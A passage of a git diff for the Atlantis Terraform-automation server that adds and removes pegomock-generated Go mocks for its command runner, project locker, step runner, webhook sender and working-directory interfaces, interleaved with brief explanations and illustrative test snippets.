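	ThenReturn([]models.ProjectCommandContext{{}, {}}, nil) // two projects to plan
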
diff --git a/server/events/mocks/mock_project_command_runner.go b/server/events/mocks/mock_project_command_runner.go
new file mode 100644
index 0000000000..cf5555e8d3
--- /dev/null
+++ b/server/events/mocks/mock_project_command_runner.go
@@ -0,0 +1,116 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectCommandRunner)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockProjectCommandRunner struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockProjectCommandRunner() *MockProjectCommandRunner {
+ return &MockProjectCommandRunner{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockProjectCommandRunner) Plan(ctx models.ProjectCommandContext) events.ProjectCommandResult {
+ params := []pegomock.Param{ctx}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Plan", params, []reflect.Type{reflect.TypeOf((*events.ProjectCommandResult)(nil)).Elem()})
+ var ret0 events.ProjectCommandResult
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(events.ProjectCommandResult)
+ }
+ }
+ return ret0
+}
+
+func (mock *MockProjectCommandRunner) Apply(ctx models.ProjectCommandContext) events.ProjectCommandResult {
+ params := []pegomock.Param{ctx}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Apply", params, []reflect.Type{reflect.TypeOf((*events.ProjectCommandResult)(nil)).Elem()})
+ var ret0 events.ProjectCommandResult
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(events.ProjectCommandResult)
+ }
+ }
+ return ret0
+}
+
+func (mock *MockProjectCommandRunner) VerifyWasCalledOnce() *VerifierProjectCommandRunner {
+ return &VerifierProjectCommandRunner{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockProjectCommandRunner) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectCommandRunner {
+ return &VerifierProjectCommandRunner{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockProjectCommandRunner) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectCommandRunner {
+ return &VerifierProjectCommandRunner{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierProjectCommandRunner struct {
+ mock *MockProjectCommandRunner
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierProjectCommandRunner) Plan(ctx models.ProjectCommandContext) *ProjectCommandRunner_Plan_OngoingVerification {
+ params := []pegomock.Param{ctx}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Plan", params)
+ return &ProjectCommandRunner_Plan_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandRunner_Plan_OngoingVerification struct {
+ mock *MockProjectCommandRunner
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandRunner_Plan_OngoingVerification) GetCapturedArguments() models.ProjectCommandContext {
+ ctx := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1]
+}
+
+func (c *ProjectCommandRunner_Plan_OngoingVerification) GetAllCapturedArguments() (_param0 []models.ProjectCommandContext) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.ProjectCommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.ProjectCommandContext)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierProjectCommandRunner) Apply(ctx models.ProjectCommandContext) *ProjectCommandRunner_Apply_OngoingVerification {
+ params := []pegomock.Param{ctx}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Apply", params)
+ return &ProjectCommandRunner_Apply_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandRunner_Apply_OngoingVerification struct {
+ mock *MockProjectCommandRunner
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandRunner_Apply_OngoingVerification) GetCapturedArguments() models.ProjectCommandContext {
+ ctx := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1]
+}
+
+func (c *ProjectCommandRunner_Apply_OngoingVerification) GetAllCapturedArguments() (_param0 []models.ProjectCommandContext) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.ProjectCommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.ProjectCommandContext)
+ }
+ }
+ return
+}
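
ProjectCommandRunner is the execution half: Plan and Apply each consume one models.ProjectCommandContext produced by the builder and yield an events.ProjectCommandResult. A fragment pairing it with the builder sketch above (illustrative):

r := mocks.NewMockProjectCommandRunner()
var res events.ProjectCommandResult // zero value stands in for a real result
pegomock.When(r.Plan(models.ProjectCommandContext{})).ThenReturn(res)
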
diff --git a/server/events/mocks/mock_project_lock.go b/server/events/mocks/mock_project_lock.go
new file mode 100644
index 0000000000..b28b6d2206
--- /dev/null
+++ b/server/events/mocks/mock_project_lock.go
@@ -0,0 +1,98 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectLocker)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+ models "github.com/runatlantis/atlantis/server/events/models"
+ logging "github.com/runatlantis/atlantis/server/logging"
+)
+
+type MockProjectLocker struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockProjectLocker() *MockProjectLocker {
+ return &MockProjectLocker{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*events.TryLockResponse, error) {
+ params := []pegomock.Param{log, pull, user, workspace, project}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((**events.TryLockResponse)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 *events.TryLockResponse
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(*events.TryLockResponse)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockProjectLocker) VerifyWasCalledOnce() *VerifierProjectLocker {
+ return &VerifierProjectLocker{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockProjectLocker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectLocker {
+ return &VerifierProjectLocker{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockProjectLocker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectLocker {
+ return &VerifierProjectLocker{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierProjectLocker struct {
+ mock *MockProjectLocker
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) *ProjectLocker_TryLock_OngoingVerification {
+ params := []pegomock.Param{log, pull, user, workspace, project}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock", params)
+ return &ProjectLocker_TryLock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectLocker_TryLock_OngoingVerification struct {
+ mock *MockProjectLocker
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectLocker_TryLock_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, models.PullRequest, models.User, string, models.Project) {
+ log, pull, user, workspace, project := c.GetAllCapturedArguments()
+ return log[len(log)-1], pull[len(pull)-1], user[len(user)-1], workspace[len(workspace)-1], project[len(project)-1]
+}
+
+func (c *ProjectLocker_TryLock_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []models.PullRequest, _param2 []models.User, _param3 []string, _param4 []models.Project) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*logging.SimpleLogger, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*logging.SimpleLogger)
+ }
+ _param1 = make([]models.PullRequest, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.PullRequest)
+ }
+ _param2 = make([]models.User, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(models.User)
+ }
+ _param3 = make([]string, len(params[3]))
+ for u, param := range params[3] {
+ _param3[u] = param.(string)
+ }
+ _param4 = make([]models.Project, len(params[4]))
+ for u, param := range params[4] {
+ _param4[u] = param.(models.Project)
+ }
+ }
+ return
+}
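
ProjectLocker.TryLock returns a *events.TryLockResponse plus an error, richer than the bool returned by the workspace-level TryLock earlier in this diff, so tests can model both the acquired and already-held cases. An illustrative fragment (the "default" workspace name and the zero-value response are assumptions; TryLockResponse's fields are not shown in this diff):

l := mocks.NewMockProjectLocker()
var (
	logger  *logging.SimpleLogger // nil logger is fine for a stubbing example
	pull    models.PullRequest
	user    models.User
	project models.Project
	resp    events.TryLockResponse
)
pegomock.When(l.TryLock(logger, pull, user, "default", project)).
	ThenReturn(&resp, nil)
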
diff --git a/server/events/mocks/mock_project_pre_executor.go b/server/events/mocks/mock_project_pre_executor.go
deleted file mode 100644
index cd36116f3a..0000000000
--- a/server/events/mocks/mock_project_pre_executor.go
+++ /dev/null
@@ -1,85 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectPreExecutor)
-
-package mocks
-
-import (
- "reflect"
-
- pegomock "github.com/petergtz/pegomock"
- events "github.com/runatlantis/atlantis/server/events"
- models "github.com/runatlantis/atlantis/server/events/models"
-)
-
-type MockProjectPreExecutor struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockProjectPreExecutor() *MockProjectPreExecutor {
- return &MockProjectPreExecutor{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockProjectPreExecutor) Execute(ctx *events.CommandContext, repoDir string, project models.Project) events.PreExecuteResult {
- params := []pegomock.Param{ctx, repoDir, project}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.PreExecuteResult)(nil)).Elem()})
- var ret0 events.PreExecuteResult
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(events.PreExecuteResult)
- }
- }
- return ret0
-}
-
-func (mock *MockProjectPreExecutor) VerifyWasCalledOnce() *VerifierProjectPreExecutor {
- return &VerifierProjectPreExecutor{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockProjectPreExecutor) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectPreExecutor {
- return &VerifierProjectPreExecutor{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockProjectPreExecutor) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectPreExecutor {
- return &VerifierProjectPreExecutor{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierProjectPreExecutor struct {
- mock *MockProjectPreExecutor
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierProjectPreExecutor) Execute(ctx *events.CommandContext, repoDir string, project models.Project) *ProjectPreExecutor_Execute_OngoingVerification {
- params := []pegomock.Param{ctx, repoDir, project}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params)
- return &ProjectPreExecutor_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type ProjectPreExecutor_Execute_OngoingVerification struct {
- mock *MockProjectPreExecutor
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *ProjectPreExecutor_Execute_OngoingVerification) GetCapturedArguments() (*events.CommandContext, string, models.Project) {
- ctx, repoDir, project := c.GetAllCapturedArguments()
- return ctx[len(ctx)-1], repoDir[len(repoDir)-1], project[len(project)-1]
-}
-
-func (c *ProjectPreExecutor_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []string, _param2 []models.Project) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]*events.CommandContext, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(*events.CommandContext)
- }
- _param1 = make([]string, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.(string)
- }
- _param2 = make([]models.Project, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(models.Project)
- }
- }
- return
-}
diff --git a/server/events/mocks/mock_step_runner.go b/server/events/mocks/mock_step_runner.go
new file mode 100644
index 0000000000..5668e90ffd
--- /dev/null
+++ b/server/events/mocks/mock_step_runner.go
@@ -0,0 +1,88 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: StepRunner)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockStepRunner struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockStepRunner() *MockStepRunner {
+ return &MockStepRunner{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+ params := []pegomock.Param{ctx, extraArgs, path}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Run", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 string
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(string)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockStepRunner) VerifyWasCalledOnce() *VerifierStepRunner {
+ return &VerifierStepRunner{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockStepRunner) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierStepRunner {
+ return &VerifierStepRunner{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockStepRunner) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierStepRunner {
+ return &VerifierStepRunner{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierStepRunner struct {
+ mock *MockStepRunner
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) *StepRunner_Run_OngoingVerification {
+ params := []pegomock.Param{ctx, extraArgs, path}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Run", params)
+ return &StepRunner_Run_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type StepRunner_Run_OngoingVerification struct {
+ mock *MockStepRunner
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *StepRunner_Run_OngoingVerification) GetCapturedArguments() (models.ProjectCommandContext, []string, string) {
+ ctx, extraArgs, path := c.GetAllCapturedArguments()
+ return ctx[len(ctx)-1], extraArgs[len(extraArgs)-1], path[len(path)-1]
+}
+
+func (c *StepRunner_Run_OngoingVerification) GetAllCapturedArguments() (_param0 []models.ProjectCommandContext, _param1 [][]string, _param2 []string) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.ProjectCommandContext, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.ProjectCommandContext)
+ }
+ _param1 = make([][]string, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.([]string)
+ }
+ _param2 = make([]string, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(string)
+ }
+ }
+ return
+}
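
The generated mocks above all follow the standard pegomock pattern: stub a call with `When(...).ThenReturn(...)`, exercise the mock, then verify the invocation and capture its arguments. A minimal sketch of how a test might use the new `MockStepRunner` (the test name and literal values are invented for illustration):

```go
package events_test

import (
	"testing"

	. "github.com/petergtz/pegomock"
	"github.com/runatlantis/atlantis/server/events/mocks"
	"github.com/runatlantis/atlantis/server/events/models"
)

func TestStepRunnerMock_Sketch(t *testing.T) {
	RegisterMockTestingT(t) // route mock failures through *testing.T
	runner := mocks.NewMockStepRunner()
	ctx := models.ProjectCommandContext{Workspace: "default"}

	// Stub: a call with these exact arguments returns canned output.
	When(runner.Run(ctx, nil, "/tmp/repo")).ThenReturn("plan output", nil)

	out, err := runner.Run(ctx, nil, "/tmp/repo")
	if err != nil || out != "plan output" {
		t.Fatalf("got %q, %v", out, err)
	}

	// Verify the single invocation and recover the captured path argument.
	_, _, path := runner.VerifyWasCalledOnce().Run(ctx, nil, "/tmp/repo").GetCapturedArguments()
	if path != "/tmp/repo" {
		t.Fatalf("got path %q", path)
	}
}
```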
diff --git a/server/events/mocks/mock_webhooks_sender.go b/server/events/mocks/mock_webhooks_sender.go
new file mode 100644
index 0000000000..dfd588807a
--- /dev/null
+++ b/server/events/mocks/mock_webhooks_sender.go
@@ -0,0 +1,81 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: WebhooksSender)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ webhooks "github.com/runatlantis/atlantis/server/events/webhooks"
+ logging "github.com/runatlantis/atlantis/server/logging"
+)
+
+type MockWebhooksSender struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockWebhooksSender() *MockWebhooksSender {
+ return &MockWebhooksSender{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockWebhooksSender) Send(log *logging.SimpleLogger, res webhooks.ApplyResult) error {
+ params := []pegomock.Param{log, res}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Send", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(error)
+ }
+ }
+ return ret0
+}
+
+func (mock *MockWebhooksSender) VerifyWasCalledOnce() *VerifierWebhooksSender {
+ return &VerifierWebhooksSender{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockWebhooksSender) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierWebhooksSender {
+ return &VerifierWebhooksSender{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockWebhooksSender) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierWebhooksSender {
+ return &VerifierWebhooksSender{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierWebhooksSender struct {
+ mock *MockWebhooksSender
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierWebhooksSender) Send(log *logging.SimpleLogger, res webhooks.ApplyResult) *WebhooksSender_Send_OngoingVerification {
+ params := []pegomock.Param{log, res}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Send", params)
+ return &WebhooksSender_Send_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WebhooksSender_Send_OngoingVerification struct {
+ mock *MockWebhooksSender
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WebhooksSender_Send_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, webhooks.ApplyResult) {
+ log, res := c.GetAllCapturedArguments()
+ return log[len(log)-1], res[len(res)-1]
+}
+
+func (c *WebhooksSender_Send_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []webhooks.ApplyResult) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*logging.SimpleLogger, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*logging.SimpleLogger)
+ }
+ _param1 = make([]webhooks.ApplyResult, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(webhooks.ApplyResult)
+ }
+ }
+ return
+}
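
The same pattern covers error paths. A short sketch (names and values invented) that stubs `MockWebhooksSender` to fail, so a caller's error handling can be exercised:

```go
package events_test

import (
	"errors"
	"testing"

	. "github.com/petergtz/pegomock"
	"github.com/runatlantis/atlantis/server/events/mocks"
	"github.com/runatlantis/atlantis/server/events/webhooks"
	"github.com/runatlantis/atlantis/server/logging"
)

func TestWebhooksSenderMock_ErrorPath(t *testing.T) {
	RegisterMockTestingT(t)
	sender := mocks.NewMockWebhooksSender()
	log := logging.NewNoopLogger()
	res := webhooks.ApplyResult{}

	// Stub Send to return an error for these exact arguments.
	When(sender.Send(log, res)).ThenReturn(errors.New("webhook failed"))

	if err := sender.Send(log, res); err == nil {
		t.Fatal("expected the stubbed error")
	}
}
```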
diff --git a/server/events/mocks/mock_working_dir.go b/server/events/mocks/mock_working_dir.go
new file mode 100644
index 0000000000..8a84ea236f
--- /dev/null
+++ b/server/events/mocks/mock_working_dir.go
@@ -0,0 +1,238 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: WorkingDir)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+ logging "github.com/runatlantis/atlantis/server/logging"
+)
+
+type MockWorkingDir struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockWorkingDir() *MockWorkingDir {
+ return &MockWorkingDir{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockWorkingDir) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) (string, error) {
+ params := []pegomock.Param{log, baseRepo, headRepo, p, workspace}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Clone", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 string
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(string)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockWorkingDir) GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) (string, error) {
+ params := []pegomock.Param{r, p, workspace}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("GetWorkingDir", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 string
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(string)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockWorkingDir) Delete(r models.Repo, p models.PullRequest) error {
+ params := []pegomock.Param{r, p}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("Delete", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(error)
+ }
+ }
+ return ret0
+}
+
+func (mock *MockWorkingDir) DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) error {
+ params := []pegomock.Param{r, p, workspace}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("DeleteForWorkspace", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(error)
+ }
+ }
+ return ret0
+}
+
+func (mock *MockWorkingDir) VerifyWasCalledOnce() *VerifierWorkingDir {
+ return &VerifierWorkingDir{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockWorkingDir) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierWorkingDir {
+ return &VerifierWorkingDir{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockWorkingDir) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierWorkingDir {
+ return &VerifierWorkingDir{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierWorkingDir struct {
+ mock *MockWorkingDir
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierWorkingDir) Clone(log *logging.SimpleLogger, baseRepo models.Repo, headRepo models.Repo, p models.PullRequest, workspace string) *WorkingDir_Clone_OngoingVerification {
+ params := []pegomock.Param{log, baseRepo, headRepo, p, workspace}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Clone", params)
+ return &WorkingDir_Clone_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDir_Clone_OngoingVerification struct {
+ mock *MockWorkingDir
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDir_Clone_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, models.Repo, models.Repo, models.PullRequest, string) {
+ log, baseRepo, headRepo, p, workspace := c.GetAllCapturedArguments()
+ return log[len(log)-1], baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], p[len(p)-1], workspace[len(workspace)-1]
+}
+
+func (c *WorkingDir_Clone_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []models.Repo, _param2 []models.Repo, _param3 []models.PullRequest, _param4 []string) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]*logging.SimpleLogger, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(*logging.SimpleLogger)
+ }
+ _param1 = make([]models.Repo, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.Repo)
+ }
+ _param2 = make([]models.Repo, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(models.Repo)
+ }
+ _param3 = make([]models.PullRequest, len(params[3]))
+ for u, param := range params[3] {
+ _param3[u] = param.(models.PullRequest)
+ }
+ _param4 = make([]string, len(params[4]))
+ for u, param := range params[4] {
+ _param4[u] = param.(string)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierWorkingDir) GetWorkingDir(r models.Repo, p models.PullRequest, workspace string) *WorkingDir_GetWorkingDir_OngoingVerification {
+ params := []pegomock.Param{r, p, workspace}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "GetWorkingDir", params)
+ return &WorkingDir_GetWorkingDir_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDir_GetWorkingDir_OngoingVerification struct {
+ mock *MockWorkingDir
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDir_GetWorkingDir_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) {
+ r, p, workspace := c.GetAllCapturedArguments()
+ return r[len(r)-1], p[len(p)-1], workspace[len(workspace)-1]
+}
+
+func (c *WorkingDir_GetWorkingDir_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.Repo, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.Repo)
+ }
+ _param1 = make([]models.PullRequest, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.PullRequest)
+ }
+ _param2 = make([]string, len(params[2]))
+ for u, param := range params[2] {
+ _param2[u] = param.(string)
+ }
+ }
+ return
+}
+
+func (verifier *VerifierWorkingDir) Delete(r models.Repo, p models.PullRequest) *WorkingDir_Delete_OngoingVerification {
+ params := []pegomock.Param{r, p}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Delete", params)
+ return &WorkingDir_Delete_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type WorkingDir_Delete_OngoingVerification struct {
+ mock *MockWorkingDir
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *WorkingDir_Delete_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest) {
+ r, p := c.GetAllCapturedArguments()
+ return r[len(r)-1], p[len(p)-1]
+}
+
+func (c *WorkingDir_Delete_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.Repo, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.Repo)
+ }
+ _param1 = make([]models.PullRequest, len(params[1]))
+ for u, param := range params[1] {
